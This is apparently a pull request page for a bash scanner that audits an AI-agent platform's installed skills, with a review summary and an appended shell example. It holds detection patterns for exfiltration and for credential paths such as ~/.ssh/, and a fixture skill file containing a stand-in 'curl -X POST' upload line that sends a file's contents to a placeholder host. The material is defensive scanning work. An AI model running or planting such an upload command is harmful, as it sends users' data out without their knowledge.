โ† Back to PRs

#20266: feat: skills-audit — Phase 1 security scanner for installed skills

by theMachineClay, open, 2026-02-18 18:22
scripts size: M
## Summary

Prototype implementation of `skills-audit`, the Phase 1 security scanner proposed in [RFC #10890](https://github.com/openclaw/openclaw/issues/10890). This is a standalone bash script that scans all installed OpenClaw skills and flags security risks. It's designed to be the foundation for a future `openclaw skills audit` CLI command.

## What it scans

| Check | Description |
|-------|-------------|
| **Tool references** | Flags skills that reference `exec`, `browser`, `web_fetch`, `gateway`, `nodes`, `cron`, `message` in SKILL.md |
| **Executables** | Detects `.sh`, `.py`, `.js`, `.rb`, `.go` files in skill directories |
| **Sensitive paths** | Checks for references to `~/.ssh/`, `~/.aws/`, credentials, tokens, private keys |
| **Exfiltration patterns** | Scans executables for `curl POST`, `requests.post`, `webhook`, `base64 encode`, etc. |
| **Permission manifest** | Checks for `permissions.json`, `permissions.yaml`, or `skill.json` |
| **Integrity hashes** | Computes SHA-256 of each SKILL.md for tamper detection |

## Risk classification

| Level | Criteria |
|-------|----------|
| 🔴 **High** | `exec` + network tool combo, or exfiltration patterns found |
| 🟡 **Medium** | Uses `exec`, or references sensitive paths |
| 🔵 **Low** | Contains executables but no other flags |
| 🟢 **Clean** | No executables, no risky tools, no sensitive path access |

## Usage

```bash
# Scan default skill locations
./scripts/security/skills-audit.sh

# Verbose (detailed findings per skill)
./scripts/security/skills-audit.sh -v

# JSON output (for CI/automation)
./scripts/security/skills-audit.sh -j
```

## Test results

Ran against a real OpenClaw 2026.2.15 installation (51 bundled + 1 workspace skill):

- 🟡 3 medium-risk skills flagged (coding-agent, tmux, 1p3a-sweep)
- 🟢 49 clean skills
- 📋 **0 out of 52 skills have a permission manifest** — confirming the RFC's urgency
- 📦 0 exfiltration patterns detected in bundled skills (good!)

## Next steps

This PR is the first building block. Follow-up work:

1. **Permission manifest JSON Schema** — so skills can declare what they need (Phase 1.2 of the RFC)
2. **Hash persistence** — store hashes on install, compare on audit to detect tampering (Phase 1.3)
3. **CLI integration** — wire this into `openclaw skills audit` as a first-class command
4. **Runtime enforcement** — [SkillSandbox](https://github.com/theMachineClay/skillsandbox) implements Phase 3 (capability-based runtime isolation with seccomp-bpf, iptables, filesystem scoping, MCP integration)
5. **Session-aware policy** — [AgentTrace](https://github.com/theMachineClay/agenttrace) adds stateful violation tracking for Phase 3 anomaly detection

Happy to iterate on feedback. The goal is to make the skill ecosystem trustworthy enough to grow safely.

Refs: #10890, #7827, #12565, #10827

Co-Authored-By: Ivy Fei <ivy.d.fei@gmail.com>

### Greptile Summary

Adds a standalone bash script (`scripts/security/skills-audit.sh`) that scans installed OpenClaw skills for security risks (dangerous tool references, executables, sensitive paths, exfiltration patterns) and classifies them by risk level. This is a Phase 1 prototype for RFC #10890.

- The table header output is broken: `echo -e` is used with `printf`-style format specifiers (`%-8s`) which it doesn't interpret, resulting in literal format strings in the output
- JSON output mode has an injection vulnerability: `$skill_name` is interpolated directly into a heredoc JSON template without escaping — skill names containing `"` or `\` will produce invalid/injected JSON
- The "no permission manifest" footer summary uses wrong logic — it checks if any non-clean skills exist but reports **all** skills as missing manifests
- The sensitive path patterns (`token`, `secret`, `password`, `credentials`) will produce high false-positive rates when scanning SKILL.md documentation files, since these words appear legitimately in 23+ skill docs across the repo

### Confidence Score: 2/5

- This PR has multiple functional bugs that need fixing before merge — broken output formatting, JSON injection, and incorrect summary logic.
- Score reflects three distinct bugs (broken echo/printf header, JSON injection in output mode, wrong manifest count logic) plus a design issue with false-positive-prone patterns. The script is a standalone addition so risk to existing code is low, but it won't work correctly as-is.
- `scripts/security/skills-audit.sh` — all issues are in this file

Last reviewed commit: beff8e6
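The review above names three fixable defects in the script: a header printed with `echo -e`, skill names interpolated unescaped into JSON, and a manifest count tied to risk level. The POSIX shell below is an added example, not the PR's `skills-audit.sh` and not OpenClaw project code. It implements the PR's risk table as `classify_risk`, escapes every value before it reaches a JSON string, prints the header with `printf`, and counts missing manifests independently of risk. The function names, the grep patterns and the three sample skills created under `mktemp` are constructed for this example; the sensitive-path check uses only path-shaped patterns (no bare `token` or `secret`), which is the false-positive mitigation the review points at.

```shell
#!/bin/sh
# Added example (not the PR's script): safe JSON emission, a printf-based
# table header, the four-level risk classifier from the PR's table, and an
# independent "missing manifest" count. All skill content is constructed.

# Escape a value for use inside a JSON string literal (backslash, quote, tab).
json_escape() {
  tab=$(printf '\t')
  printf '%s' "$1" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g' -e "s/$tab/\\\\t/g"
}

# Risk level per the PR's table. Inputs are 0/1 flags:
#   $1 uses exec, $2 uses a network tool (browser/web_fetch/...),
#   $3 exfiltration pattern found, $4 sensitive path referenced,
#   $5 executables present. A network tool alone is not scored by the table;
#   this example (an assumption) lets it fall through to Low or Clean.
classify_risk() {
  if [ "$3" -eq 1 ] || { [ "$1" -eq 1 ] && [ "$2" -eq 1 ]; }; then
    echo High
  elif [ "$1" -eq 1 ] || [ "$4" -eq 1 ]; then
    echo Medium
  elif [ "$5" -eq 1 ]; then
    echo Low
  else
    echo Clean
  fi
}

# Exit status 0 when the skill directory carries one of the manifest files
# the PR checks for.
has_manifest() {
  [ -f "$1/permissions.json" ] || [ -f "$1/permissions.yaml" ] || [ -f "$1/skill.json" ]
}

# One JSON record per skill; every interpolated string goes through json_escape,
# so a name containing " or \ cannot break out of its field.
skill_json() {
  printf '{"skill":"%s","risk":"%s","manifest":%s}' \
    "$(json_escape "$1")" "$(json_escape "$2")" "$3"
}

# printf interprets %-8s; echo -e would print the specifier literally.
print_header() {
  printf '%-8s %-24s %s\n' RISK SKILL MANIFEST
}

# Scan one skill directory and echo "<risk> <manifest 0/1>".
# -w matches whole words, so "execute" in prose does not count as exec.
audit_skill() {
  dir=$1; md="$dir/SKILL.md"
  uses_exec=0; uses_net=0; exfil=0; sensitive=0; has_exec_files=0
  grep -qw 'exec' "$md" 2>/dev/null && uses_exec=1
  grep -qwE 'browser|web_fetch|gateway|nodes|message' "$md" 2>/dev/null && uses_net=1
  grep -qE '~/\.ssh/|~/\.aws/|private key' "$md" 2>/dev/null && sensitive=1
  for f in "$dir"/*.sh "$dir"/*.py "$dir"/*.js "$dir"/*.rb "$dir"/*.go; do
    [ -f "$f" ] || continue
    has_exec_files=1
    grep -qE 'curl .*(-X *POST|--data)|requests\.post|webhook|base64' "$f" && exfil=1
  done
  manifest=0; has_manifest "$dir" && manifest=1
  echo "$(classify_risk $uses_exec $uses_net $exfil $sensitive $has_exec_files) $manifest"
}

# Count skills without a manifest on their own, not via the risk buckets.
count_missing_manifest() {
  n=0
  for d in "$1"/*/; do
    [ -d "$d" ] || continue
    has_manifest "$d" || n=$((n + 1))
  done
  echo "$n"
}

# Constructed sample skills so the example runs offline.
make_sample_skills() {
  root=$(mktemp -d)
  mkdir -p "$root/deploy-tool" "$root/clean-note" "$root/tmux-helper"
  printf 'Uses exec and web_fetch to deploy.\n' > "$root/deploy-tool/SKILL.md"
  printf 'curl -X POST https://example.invalid/hook -d @out\n' > "$root/deploy-tool/push.sh"
  printf 'Just formats notes.\n' > "$root/clean-note/SKILL.md"
  printf '{}\n' > "$root/clean-note/permissions.json"
  printf 'Runs exec in a tmux pane.\n' > "$root/tmux-helper/SKILL.md"
  echo "$root"
}

root=$(make_sample_skills)
print_header
for d in "$root"/*/; do
  name=$(basename "$d")
  set -- $(audit_skill "$d")
  printf '%-8s %-24s %s\n' "$1" "$name" "$2"
  skill_json "$name" "$1" "$2"; echo
done
printf 'skills without a permission manifest: %s\n' "$(count_missing_manifest "$root")"
rm -rf "$root"
```

Running the file prints one table row and one JSON record per sample skill (High for `deploy-tool`, Medium for `tmux-helper`, Clean for `clean-note`) followed by a manifest count of 2, then removes the sample tree. For a real scan, point `audit_skill` and `count_missing_manifest` at the installed skills directory instead of the `mktemp` tree.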
